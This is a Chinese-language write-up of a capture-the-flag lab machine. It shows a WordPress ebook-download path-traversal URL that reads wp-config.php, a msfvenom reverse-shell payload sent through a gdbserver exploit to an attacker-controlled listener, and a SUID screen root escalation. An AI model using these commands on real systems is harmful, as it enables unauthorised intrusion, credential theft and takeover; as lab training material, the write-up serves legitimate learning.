0x01 前言#
靶机 ip:10.10.11.125。
本机 ip:10.10.16.21,mac m1。
0x02 简单的信息收集#
fscan 端口扫描只发现了 22、80 端口,nmap 扫描下,还发现一个 1337 端口,不确定这个端口是什么作用的。
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
wpsan 扫描出来的结果也没啥可用的信息。
在 wordpress 的 wp-content 目录下有个插件目录,访问http://10.10.11.125/wp-content/plugins/,有一个 php 文件和 eboo-download 目录,以为 hello.php 是木马文件,经分析发现不是木马,ebook-download 既然在 plugins 目录下且查看 readme.txt,确认是一个插件。
0x03 漏洞利用#
在https://www.exploit-db.com/ 网站上搜索 exp,发现有个目录穿越漏洞。
poc 如下:
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
下载 wp-config 文件。
http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
这个文件存放了数据库的用户名和密码,尝试登录 wordpress 后台,无法登录。
到这就没啥思路了,看了下 wp,发现可以利用 1337 端口上的服务,直接 rce,1337 端口上运行着 gdbserver 服务,gdbserver 的渗透可参考:https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver,gdbserver 的利用脚本 url:https://www.exploit-db.com/exploits/50539。
漏洞利用流程:
1、先将 exp 下载到本地。
2、msfvenom 生成 shellcode。
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1234 PrependFork=true -o rev.bin
3、本地监听
nc -lvp 1234
4、运行 exp
python3 gdbserver_exp.py 10.10.11.125:1337 rev.bin
升级交互式终端。
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256color
还有一种探测目标服务器的运行了什么服务的方法是利用 /proc/pid/cmdline 文件,在 proc 根目录下,以数字命名的目录表示当前一个运行的进程,目录名为进程的 pid。
通过 burpsuite 遍历 pid 然后枚举目标服务器运行的服务。
0x04 提权#
查找以 root 用户运行的具有 suid 的文件,有一个文件 /usr/bin/screen 存在 suid 设置。
find / -perm -4000 -type f 2>/dev/null
screen -x root/root
0x05 总结#
1、学习了如何结合任意文件读取漏洞探测目标服务器上运行的服务,screen 提权等知识点。
参考:
https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver
https://zhuanlan.zhihu.com/p/437147174